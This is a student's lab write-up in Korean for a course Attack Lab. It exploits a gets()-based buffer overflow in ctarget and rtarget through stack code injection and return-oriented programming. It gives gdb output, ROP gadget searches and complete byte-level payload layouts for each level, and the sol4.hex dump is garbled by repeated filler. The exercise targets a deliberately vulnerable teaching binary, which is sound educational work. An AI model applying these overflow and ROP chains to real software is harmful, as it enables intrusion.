The Attack Lab: Understanding Buffer Overflow Bugs

20190084 권민재, CSED211

Preface

Using gdb-peda with AT&T syntax.

getbuf

```
unsigned getbuf()
{
    char buf[BUFFER_SIZE];
    Gets(buf);
    return 1;
}
```

ctarget 과 rtarget 모두 함수 getbuf 를 이용하여 입력받고 있는데, 여기서 안전하지 못한 함수인 gets 를 이용하여 입력받고 있는 것을 알 수 있다. gets 는 입력의 크기를 확인하지 않기 때문에 buffer overflow 이하 bof 가 일어날 수 있으며, 이를 이용하여 Part 1과 Part 2를 해결할 것이다. gdb-peda 이하 gdb 를 이용하여 getbuf 를 disassembly 해보았을 때, sub \$0x18,%rsp 를 통해 BUFFER_SIZE 가 0x18임을 알 수 있다. 이제 bof 취약점이 발생하는 곳과, 그 버퍼의 크기를 알았으므로 이를 이용해서 문제를 해결할 것이다.

Part I: Code Injection Attacks

Level 1

분석

Objective

Level 1의 목적은 bof를 이용하여 함수 touch1 을 실행시키는 것이다. 우리는 이 프로그램에 bof 취약점이 있다는 사실을 알고 있기에, touch1 의 주소를 bof를 통해 스택에 존재하는 ret 에 쓰면 된다. 원래익스플로잇을 하기 위해서는 코드 영역의 주소를 leak 해야 하지만, 이 문제는 코드 영역의 주소가 고정되어 있으므로 코드 영역의 주소를 leak 하지 않아도 된다.

Solution

Check Address of touch1

```
gdb-peda$ p touch1
$1 = {void ()} 0x401879 <touch1>
```

Compose

	hex	description
<-24>	00 00 00 00 00 00 00 00	buffer for buf
<-16>	00 00 00 00 00 00 00 00	buffer for buf
<-8>	00 00 00 00 00 00 00 00	buffer for buf
rsp → <+0>	79 18 40 00 00 00 00 00	little endian으로 패킹된 [touch1]의 주소 [0x401879]

hex로 입력할 때에는 항상 little endian으로 패킹해야하기 때문에, 앞으로는 little endian으로 패킹했다는 말을 생략하고 표 등에 little endian으로 표현할 것이다.

Answer

sol1.hex

Result

Level 2

분석

Objective

```
void touch2(unsigned val)
{
    vlevel = 2;
    if (val == cookie) {
        printf("Touch2!: You called touch2(0x%.8x)\n", val);
        validate(2);
    } else {
        printf("Misfire: You called touch2(0x%.8x)\n", val);
        fail(2);
    }
    exit(0);
}
```

Level 2에서는 touch2 를 실행시켜서 성공해야하는데, 이때 touch2 의 인자 val 이 cookie 와 같아야한다. 즉, bof를 이용하여 touch2 를 실행하되, rdi 의 값이 cookie 가 되도록 하여 인자 val 이 cookie 가 되도록 하면 이 레벨을 풀 수 있다는 뜻이다.

Code Injection Point

```
gdb-peda$ b *0x000000000401863
Breakpoint 5 at 0x401863: file buf.c, line 12.
gdb-peda$ r -q
Starting program: /home/beta/beta/CSED/CSED211/ASSN/ASSN3/ctarget -q
Cookie: 0x78960173
[-----registers-----]
RAX: 0x0
RBX: 0x55586000 \longrightarrow 0x0
RCX: 0xc ('\x0c')
RDX: 0x7ffff7dd3780 --> 0x0
RSI: 0xc ('\x0c')
RDI: 0x60701c --> 0xa333731303639 ('960173\n')
RBP: 0x55685fe8 --> 0x4030e5 --> 0x3a6968003a697168 ('hqi:')
RSP: 0x5560d650 --> 0x401a32 (<test+14>:
                                              %eax,%edx)
                                        mov
RIP: 0x401863 (<getbuf>: sub $0x18,%rsp)
R8 : 0x7ffff7fcd700 (0x00007ffff7fcd700)
```

```
R9 : 0xc ('\x0c')
R10: 0x4033f4 ("Type string:")
R11: 0x7fffff7b7fa30 (<__memset_avx2>: vpxor %xmm0,%xmm0,%xmm0)
R12: 0x2
R13: 0x0
R14: 0x0
R15: 0x0
EFLAGS: 0x212 (carry parity ADJUST zero sign trap INTERRUPT direction overflow)
[-----code-----]
  0x401859 <scramble+1226>: callq 0x400cf0 <__stack_chk_fail@plt>
  0x40185e <scramble+1231>: add $0x38,%rsp
  0x401862 <scramble+1235>: retq
=> 0x401863 <getbuf>: sub $0x18,%rsp
  0x401867 <getbuf+4>: mov %rsp,%rdi
  0x40186a <getbuf+7>: callq 0x401aed <Gets>
  0x40186f <getbuf+12>: mov $0x1,%eax
  0x401874 <getbuf+17>: add $0x18,%rsp
[-----stack-----]
0000| 0x5560d650 --> 0x401a32 (<test+14>: mov %eax,%edx)
0008 | 0x5560d658 --> 0x2
0016 | 0x5560d660 --> 0x401fc9 (<launch+112>: cmpl $0x0,0x203558(%rip)
# 0x605528 <is_checker>)
0024 | 0x5560d668 --> 0x0
0032 | 0x5560d670 --> 0xf4f4f4f4f4f4f4f4
0040 | 0x5560d678 --> 0xf4f4f4f4f4f4f4f4
0048 | 0x5560d680 --> 0xf4f4f4f4f4f4f4f4
0056 | 0x5560d688 --> 0xf4f4f4f4f4f4f4f4
[-----]
Legend: code, data, rodata, value
Breakpoint 5, getbuf () at buf.c:12
12 in buf.c
```

```
        gdb-peda$ vmm
        0x5560d650

        Start
        End
        Perm
        Name

        0x55586000
        0x55686000
        rwxp
        mapped
```

touch2 의 시작에 breakpoint를 잡았을 때 rsp 가 0x5560d650 이고, 여기에 스택이 존재하는 것으로 파악할 수 있다. 이때, 이 주소를 이용하여 gdb에서 vmm 0x5560d650 을 실행시켰을 때, Perm 이 rwxp, 즉 실행 가능한 영역으로 매핑되어 있는 것을 확인할 수 있다. 그렇기 때문에 우리는 스택에 우리가 원하는 코드를 삽입하여 실행시킬 수 있으므로, 스택에 우리가 원하는 인자를 넣은 다음 pop rdi, ret 를 실행시켜서 이 문제를 해결할 것이다.

Solution

Check Address of touch2

```
gdb-peda$ p touch2
$2 = {void (unsigned int)} 0x4018a5 <touch2>
```

Check Address of Stack

gdb-peda\$ reg rsp RSP: 0x5560d650

Compose

	hex	Description	
<-24>	00 00 00 00 00 00 00 00	buffer for `buf`	
<-16>	00 00 00 00 00 00 00 00	buffer for `buf`	
<-8>	00 00 00 00 00 00 00 00	buffer for `buf`	
rsp => <+ 0>	68 d6 60 55 00 00 00 00	스택에 인젝션한 코드의 주소 `rsp + 24`	
<+ 8>	73 01 96 78 00 00 00 00	Cookie `0x78960173`	
<+16>	a5 18 40 00 00 00 00 00	`touch2`의 주소 `0x4018a5`	
<+24>	5f	`pop rdi` `getbuf`에서 `ret`를 통해 이 주소로 뛰게 되고, `rsp`는 Cookie 값이 있는 주소를 가리키게 된다. 이때 `pop rdi`를 하면 `rdi`에 우리가 원하는 Cookie 값이 적재되게 된다.	
<+32>	c3	`ret` `pop rdi`를 하면서 현재 `rsp`는 `touch2`의 주소를 가리키고 있는데, 이때 `ret`를 하면 우리는 `rdi`에 cookie가 담긴 채로 `touch2`를 실행할 수 있다.	

Answer

sol2.hex

Result

Level 3

분석

Objective

```
/* Compare string to hex represention of unsigned value */
int hexmatch(unsigned val, char *sval)
{
    char cbuf[110];
    /* Make position of check string unpredictable */
    char *s = cbuf + random() % 100;
    sprintf(s, "%.8x", val);
    return strncmp(sval, s, 9) == 0;
}
void touch3(char *sval)
    vlevel = 3; /* Part of validation protocol */
    if (hexmatch(cookie, sval)) {
        printf("Touch3!: You called touch3(\"%s\")\n", sval);
        validate(3);
    } else {
        printf("Misfire: You called touch3(\"%s\")\n", sval);
        fail(3);
    exit(0);
}
```

위 코드를 보면, touch3 에서는 cookie의 값을 직접적으로 받지 않고, cookie를 문자열 형태의 주소로 받아서 비교하는 것을 알 수 있다. 그렇기 때문에 우리는 bof를 이용하여 스택에 문자열을 삽입한 다음, 해당 문자열의 주소를 rdi 에 넣은 후에 touch3 을 호출하여 이 문제를 해결할 수 있다.

Solution

Check Address of touch3

```
gdb-peda$ p touch3
$2 = {void (char *)} 0x4019b6 <touch3>
```

Compose

	hex	Description
<-24>	00 00 00 00 00 00 00 00	buffer for buf
<-16>	00 00 00 00 00 00 00 00	buffer for buf
<-8>	00 00 00 00 00 00 00 00	buffer for buf
rsp => <+0>	78 d6 60 55 00 00 00 00	스택에 인젝션한 코드의 주소 rsp + 40
<+8>	68 d6 60 55 00 00 00 00	문자열의 주소 rsp + 24
<+16>	b6 19 40 00 00 00 00 00	touch3 의 주소 0x4019b6
<+24>	37 38 39 36 30 31 37 33	문자열 "78960173"
<+32>	00 00 00 00 00 00 00 00	문자열 null byte
		pop %rdi
<+40>	5f	getbuf 에서 ret 를 수행한 이후에 rsp 는 문자열의 주소를 가리키고 있기 때문에, pop %rdi를 하면 rdi 에 cookie가 있는 문자열의 주소를 적재할 수 있다.
		ret
<+41>	c3	pop %rdi를 수행한 이후에 rsp는 touch3 의 주소를 가리키고 있으므로, ret 를 통해 rdi 에 문자열 cookie 의 주소가 담긴 채로 touch3 을 실행할 수 있다.

Answer

sol3.hex

Result

Part II: Return-Oriented Programming

Check Range of farm

```
gdb-peda$ p start_farm
$3 = {<text variable, no debug info>} 0x401a4d <start_farm>
gdb-peda$ p mid_farm
$4 = {<text variable, no debug info>} 0x401a89 <mid_farm>
gdb-peda$ p end_farm
$5 = {<text variable, no debug info>} 0x401b6c <end_farm>
```

ctarget 과 달리 rtarget 에서는 스택의 주소가 정해져 있지 않고, 실행권한이 없기 때문에 우리는 rop를 이용하여 문제를 해결해야하고, 이때 farm에 있는 코드들을 rop의 가젯으로 활용할 수 있기 때문에, farm의 범위를 확인해주었다. 앞으로 이 범위 안의 함수들을 활용하여 rop 가젯을 찾아서 이용할 것이다.

Level 2

Objective

```
void touch2(unsigned val)
{
    vlevel = 2;
    if (val == cookie) {
        printf("Touch2!: You called touch2(0x%.8x)\n", val);
        validate(2);
    } else {
        printf("Misfire: You called touch2(0x%.8x)\n", val);
        fail(2);
    }
    exit(0);
}
```

rtarget 의 level2 는 ctarget 의 level2 를 rop를 이용하여 해결하는 것이다. 즉, 우리는 인자 val에 쿠키를 넣어서 touch2 를 실행해야 한다.

Collect Gadgets

Find Gadget to Write to rdi

Check pop Gadget Exist

```
gdb-peda$ ropsearch "pop ?" 0x401a53 0x401b6c
Searching for ROP gadget: 'pop ?' in range: 0x401a53 - 0x401b6c
0x00401ad3: (b'5889e0c3') pop %rax; mov %esp,%eax; retq
0x00401a84: (b'58909090c3') pop %rax; nop; nop; nop; retq
0x00401a55: (b'58909090c3') pop %rax; nop; nop; nop; retq
0x00401a7e: (b'5b2e1890c3b858909090c3') pop %rbx; sbb
%dl,%cs:-0x6fa7473d(%rax); nop; nop; retq
```

우선 우리는 rdi 에 값을 적재해야하기 때문에, pop %rdi 를 할 수 있는 가젯이 있는지 찾아보아야 한다. 이를 위해 gdb-peda 의 ropsearch 를 이용할 것인데, 위와 같이 farm에서 pop %rdi 를 할 수 있는 가젯이 존재하지 않는 것을 알 수 있었다. 즉, 우리는 rdi 로 값을 넣을 수 있는 다른 가젯을 찾아보아야할 것이다.

Check mov Gadget Exist

```
gdb-peda$ ropsearch "mov ?, rdi" 0x401a53 0x401b6c
Searching for ROP gadget: 'mov ?, rdi' in range: 0x401a53 - 0x401b6c
0x00401a70 : (b'4889c7c3') mov %rax,%rdi; retq
0x00401a62 : (b'4889c7c3') mov %rax,%rdi; retq
0x00401a69 : (b'4889c792c3') mov %rax,%rdi; xchg %eax,%edx; retq
```

```
gdb-peda$ disas 0x00401a70

Dump of assembler code for function addval_138:

0x0000000000401a6e <+0>: lea -0x3c3876b8(%rdi),%eax
0x0000000000401a74 <+6>: retq

End of assembler dump.
```

```
gdb-peda$ x/2i 0x00401a70
0x401a70 <addval_138+2>: mov %rax,%rdi
0x401a73 <addval_138+5>: retq
```

우리는 rdi 에 값을 쓸 수 있는 다른 가젯을 찾아보아야 하고, 그렇기 때문에 rdi 로 값을 mov 할 수 있는 가젯이 있는지 찾아보았다. "mov ?, rdi" 를 옵션으로 farm에서 ropsearch 를 해본 결과, mov %rax,%rdi 를 할 수 있는 가젯을 찾을 수 있었다. 이 가젯은 getva1_330 에 위치하는데, 이것을 0x00401a84 부터 읽기 시작하면 mov %rax,%rdi; retq; 가 되므로, mov %rax,%rdi 를 하는 가젯으로 사용할 수 있다. 그러면 이제, rax 에 우리가 원하는 값을 쓰기 위한 가젯을 찾아볼 것이다.

Find Gadget to Write to rax

Check pop Gadget Exist

```
gdb-peda$ ropsearch "pop rax" 0x401a53 0x401b6c
Searching for ROP gadget: 'pop rax' in range: 0x401a53 - 0x401b6c
0x00401ad3: (b'5889e0c3') pop %rax; mov %esp,%eax; retq
0x00401a84: (b'58909090c3') pop %rax; nop; nop; nop; retq
0x00401a55: (b'58909090c3') pop %rax; nop; nop; nop; retq
```

```
gdb-peda$ disas 0x00401a84

Dump of assembler code for function getval_330:

0x0000000000401a83 <+0>: mov $0x90909058,%eax
0x000000000401a88 <+5>: retq

End of assembler dump.
```

```
gdb-peda$ x/5i 0x00401a84

0x401a84 <getval_330+1>: pop %rax

0x401a85 <getval_330+2>: nop

0x401a86 <getval_330+3>: nop

0x401a87 <getval_330+4>: nop

0x401a88 <getval_330+5>: retq
```

우리는 rax 에 임의의 값을 넣을 가젯을 찾아보아야 하고, 스택에 있는 값을 넣기 위해서는 pop 을 이용할 수 있기 때문에 pop %rax를 할 수 있는 가젯을 찾아보아야 한다. 그래서 "pop rax"를 옵션으로 farm에서 ropsearch를 해본 결과, 이를 수행할 수 있는 가젯을 찾을 수 있었다. 이 가젯은 getval_330에 존재하는데, 이를 0x00401a84부터 읽기 시작하면 pop %rax; nop; nop; retq으로 해석되기때문에 pop %rax를 할 수 있는 가젯으로 쓸 수 있다.

Compose Gadgets

우리는 이제 pop %rax 를 하는 가젯과 mov %rax,%rdi 를 하는 가젯이 있으므로 이를 이용해서 이 문제를 해결할 수 있다. 스택에 cookie를 쓴 후 pop %rax 를 통해 rax 에 값을 적재하고, mov %rax,%rdi 를 통해 rdi 에 cookie를 적재한 뒤 touch2 의 주소를 이용하면 인자에 cookie를 넣어서 touch2 를 호출할 수있다.

Solution

Check Address of touch2

```
gdb-peda$ p touch2
$6 = {void (unsigned int)} 0x4018a5 <touch2>
```

Compose

	hex	description
<-24>	00 00 00 00 00 00 00	buffer for buf
<-16>	00 00 00 00 00 00 00	buffer for buf
<-8>	00 00 00 00 00 00 00 00	buffer for buf
rsp => <+0>	84 1a 40 00 00 00 00 00	Gadget pop %rax
<+8>	73 01 96 78 00 00 00 00	Cookie, 0x78960173. pop %rax 를 통해 rax 에 적재됨.
<+16>	70 1a 40 00 00 00 00 00	Gadget mov %rax, %rdi
<+24>	a5 18 40 00 00 00 00 00	Address of touch2, 0x4018a5

Answer

sol4.hex

```
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      00
      <td
```

Result

분석

Objective

```
/* Compare string to hex represention of unsigned value */
int hexmatch(unsigned val, char *sval)
    char cbuf[110];
   /* Make position of check string unpredictable */
   char *s = cbuf + random() % 100;
    sprintf(s, "%.8x", val);
    return strncmp(sval, s, 9) == 0;
}
void touch3(char *sval)
    vlevel = 3; /* Part of validation protocol */
    if (hexmatch(cookie, sval)) {
        printf("Touch3!: You called touch3(\"%s\")\n", sval);
        validate(3);
    } else {
        printf("Misfire: You called touch3(\"%s\")\n", sval);
        fail(3);
    }
    exit(0);
}
```

rtarget 의 Teve13 에서는 ctarget 의 Teve13 을 반복하되, rop를 이용하여 이 문제를 해결해야 한다. 즉, 우리는 스택에 cookie 문자열을 삽입한 다음, 그 문자열의 주소를 touch3 의 인자로 해서 함수를 호출해야 한다.

Collect Gadgets

Find Gadget to Get rsp

```
gdb-peda$ ropsearch "mov ?, ?" 0x401a53 0x401b6c
Searching for ROP gadget: 'mov ?, ?' in range: 0x401a53 - 0x401b6c
... (생략)
0x00401afa : (b'4889e0c3') mov %rsp,%rax; retq
... (생략)
```

```
gdb-peda$ x/2i 0x00401afa
0x401afa <setval_426+2>: mov %rsp,%rax
0x401afd <setval_426+5>: retq
```

rtarget 에서는 스택의 주소가 항상 바뀌기 때문에, 우선 rsp의 주소를 받을 수 있는 가젯이 있는지 찾아보아야 한다. 그래서 rsp의 값을 mov 할 수 있는 가젯이 있는지 ropsearch를 이용하여 찾아보았고, 그 결과 그를 수행할 수 있는 가젯이 존재하는 것을 알 수 있었다. 해당 가젯은 setval_426 에 존재하는 데, 이를 0x00401afa 부터 읽으면 mov %rsp,%rax; retq가 되므로, 우리는 이것을 mov %rsp,%rax를 하는 가젯으로 쓸 수 있다. 이제 우리는 rax 에 rsp의 값을 넣을 수 있으므로, rax 가 스택에 쓸 수 있는 영역을 가리킬 수 있도록 해야한다.

Find Gadget to Set rax

```
gdb-peda$ ropsearch "add ?, ?" 0x401a53 0x401b6c

Searching for ROP gadget: 'add ?, ?' in range: 0x401a53 - 0x401b6c

0x00401a91: (b'0437c3') add $0x37,%al; retq

0x00401a8c: (b'0000c3') add %al,(%rax); retq

0x00401a8a: (b'01000000c3') add %eax,(%rax); add %al,(%rax); retq

0x00401a8d: (b'00c3488d0437c3') add %al,%bl; lea (%rdi,%rsi,1),%rax; retq

0x00401a8b: (b'000000c3488d0437c3') add %al,(%rax); add %al,%bl; lea

(%rdi,%rsi,1),%rax; retq
```

```
gdb-peda$ x/2i 0x00401a91
0x401a91 <add_xy+2>: add $0x37,%al
0x401a93 <add_xy+4>: retq
```

rax 가 스택에 쓸 수 있는 영역을 가리킬 수 있도록 해야하므로, rax 에 add 를 하는 가젯을 찾아볼 것이다. 왜냐하면 현재 우리는 스택에 값을 쓸 수 있는 상태인데, 해당 값은 rsp 보다 큰 주소에 쓰이므로, rax 에 어떤 수를 더할 수 있는 가젯을 찾아서 해당 주소에 cookie 문자열을 써서 문제를 풀 수 있기 때문이다. 그래서 이를 만족하는 가젯을 찾아본 결과, add_xy 에 해당 가젯이 존재하는 것을 알 수 있었다. 0x00401a91 부터 인스트럭션 단위로 읽으면 add \$0x37,%a1; retq 로 해석되기 때문에, add \$0x37,%a1 를 하는 가젯을 사용할 수 있다. 이를 이용하여 익스플로잇을 짤 수도 있지만, 이것은 a1 에 대해 연산을 수행하기 때문에, 오버플로우가 나서 원하지 않는 결과를 초래할 수도 있다. 그렇기 때문에 우리는 다른 가젯을 사용해야한다. 하지만, 멀리 갈 것도 없이 우리는 덧셈을 하는 또 다른 가젯을 위에서 이미 찾았다. 바로 add_xy 이다. 이 함수에서는 rdi 와 rsi 를 더한 결과를 저장한다. 그러면 이를 이용해서 이제 rdi 나 rsi 가 각각 rsp 나 적절한 상수가 되도록 구성하면 우리는 이 문제를 풀 수 있을 것이다.

Find Gadget to Set rdi to rsp

```
gdb-peda$ ropsearch "mov ?, rdi" 0x401a53 0x401b6c
Searching for ROP gadget: 'mov ?, rdi' in range: 0x401a53 - 0x401b6c
0x00401a70 : (b'4889c7c3') mov %rax,%rdi; retq
0x00401a62 : (b'4889c7c3') mov %rax,%rdi; retq
0x00401a69 : (b'4889c792c3') mov %rax,%rdi; xchg %eax,%edx; retq
```

```
gdb-peda$ disas 0x00401a70

Dump of assembler code for function addval_138:

0x0000000000401a6e <+0>: lea -0x3c3876b8(%rdi),%eax
0x0000000000401a74 <+6>: retq

End of assembler dump.
```

```
gdb-peda$ x/2i 0x00401a70
0x401a70 <addval_138+2>: mov %rax,%rdi
0x401a73 <addval_138+5>: retq
```

rdi 에 rsp 의 값을 직접 넣을 수는 없지만, mov %rax,%rdi 를 수행하는 가젯을 찾을 수 있었다. 우리는 앞서 mov %rsp,%rax 를 수행하는 가젯을 찾았기 때문에, 이 두 가젯을 조합하면 rdi 에 rsp 의 값을 넣을 수 있다. 그러면 이제, rsi 의 값을 임의로 설정하기 위한 가젯을 찾아볼 것이다.

Find Gadget to Set rsi

```
gdb-peda$ ropsearch "mov ?, ?" 0x401a53 0x401b6c
Searching for ROP gadget: 'mov ?, ?' in range: 0x401a53 - 0x401b6c
... (생략)
0x00401aec : (b'89ce90c3') mov %ecx,%esi; nop; retq
... (생략)
```

rsi 로 값을 쓸 수 있는 가젯 중에서, mov %ecx, %esi 를 수행하는 가젯이 제일 유용해보였기 때문에, 이를 이용하기로 했다. 그러면 이제, ecx 를 적절히 우리가 원하는 값으로 쓸 수 있도록 하는 가젯을 찾아볼 것이다.

Find Gadget to Set ecx

```
gdb-peda$ ropsearch "mov ?, ?" 0x401a53 0x401b6c
Searching for ROP gadget: 'mov ?, ?' in range: 0x401a53 - 0x401b6c
... (생략)
0x00401a9d : (b'89d120c0c3') mov %edx,%ecx; and %al,%al; retq
... (생략)
```

 ecx 에 값을 쓰는 가젯으로 mov %edx,%ecx 를 찾을 수 있었다. 이 가젯의 뒤에는 and %a1,%a1 가 있지만, 이것은 사실상 아무것도 수행하지 않기 때문에 functional nop로 생각할 수 있다. 이제, rdx 에 값을 쓰는 가젯을 찾아보자.

Find Gadget to Set edx

```
gdb-peda$ ropsearch "mov ?, ?" 0x401a53 0x401b6c
Searching for ROP gadget: 'mov ?, ?' in range: 0x401a53 - 0x401b6c
... (생략)
0x00401aa3 : (b'89c29090c3') mov %eax,%edx; nop; nop; retq
... (생략)
```

edx 에 값을 쓰는 가젯으로 mov %eax,%edx 를 찾을 수 있었다. 이때, 우리는 앞서 Level2에서 사용한 가 젯인 pop %rax (0x00401a84) 를 이용할 것이다. 그러면 우리는, 스택에 임의의 값을 쓴 다음에 pop %rax 를 통해 해당 값을 rax 에 적재한 후, 이것을 eax 에 복사해서 이 문제를 해결할 수 있을 것이다!

Compose Gadgets

우선 우리가 원하는 만큼의 오프셋을 스택에 적고, pop %rax 가젯을 이용하여 rax 에 그를 적재할 것이다. 이때, 오프셋은 우리가 rop할 코드의 길이에 따라 달라질 것이기 때문에 아래 Solution 파트에서 기입할 것이다. 이후, mov %eax,%edx 가젯과 mov %edx,%ecx 가젯 그리고 mov %ecx,%esi을 차례로 이용하여 오프셋을 esi에 적재할 것이다. 이제 mov %rsp,%rax 가젯을 이용하여 rsp의 값을 따낸 다음 mov %rax,%rdi를 통해 rdi에 rsp의 값을 담을 것이다. 이제 이상태에서 add_xy를 이용하면 rdi+rsi, 즉 rsp의 값과 우리가 적은 임의의 오프셋의 합이 rax 에 담길 것이다. 이상황에서 Level2에서 찾은 mov %rax,%rdi 가젯을 이용하면 우리가 임의로 쓴 주소를 rdi에 담을 수 있고, 이후 touch3의 주소를 적어서 우리가 원하는 임의의 주소를 인자로 touch3을 호출할 수 있다.

Solution

Check Address of touch3

```
gdb-peda$ p touch3
$7 = {void (char *)} 0x4019b6 <touch3>
```

Compose

	hex	Description
<-24>	00 00 00 00 00 00 00 00	buffer for buf
<-16>	00 00 00 00 00 00 00 00	buffer for buf
<-8>	00 00 00 00 00 00 00	buffer for buf
rsp => <+0>	84 1a 40 00 00 00 00 00	Gadget pop %rax (0x00401a84)
<+8>	20 00 00 00 00 00 00 00	Offset (0x20)
<+16>	a3 1a 40 00 00 00 00 00	Gadget mov %eax,%edx (0x00401aa3)
<+ <u>2</u> 4>	9d 1a 40 00 00 00 00 00	Gadget mov %edx,%ecx (0x00401a9d)
<+32>	ec 1a 40 00 00 00 00 00	Gadget mov %ecx,%esi (0x00401aec)
<+40>	fa 1a 40 00 00 00 00 00	Gadget mov %rsp,%rax (0x00401afa)
<+48>	70 1a 40 00 00 00 00 00	Gadget mov %rax,%rdi (0x00401a70)
<+56>	8f 1a 40 00 00 00 00 00	add_xy (0x401a8f)
<+64>	70 1a 40 00 00 00 00 00	Gadget mov %rax,%rdi (0x00401a70)
<+72>	b6 19 40 00 00 00 00 00	Address of touch3 0x4019b6
<+80>	37 38 39 36 30 31 37 33	Cookie 문자열 "78960173"
<+88>	00	Null byte

Answer

sol5.hex

Result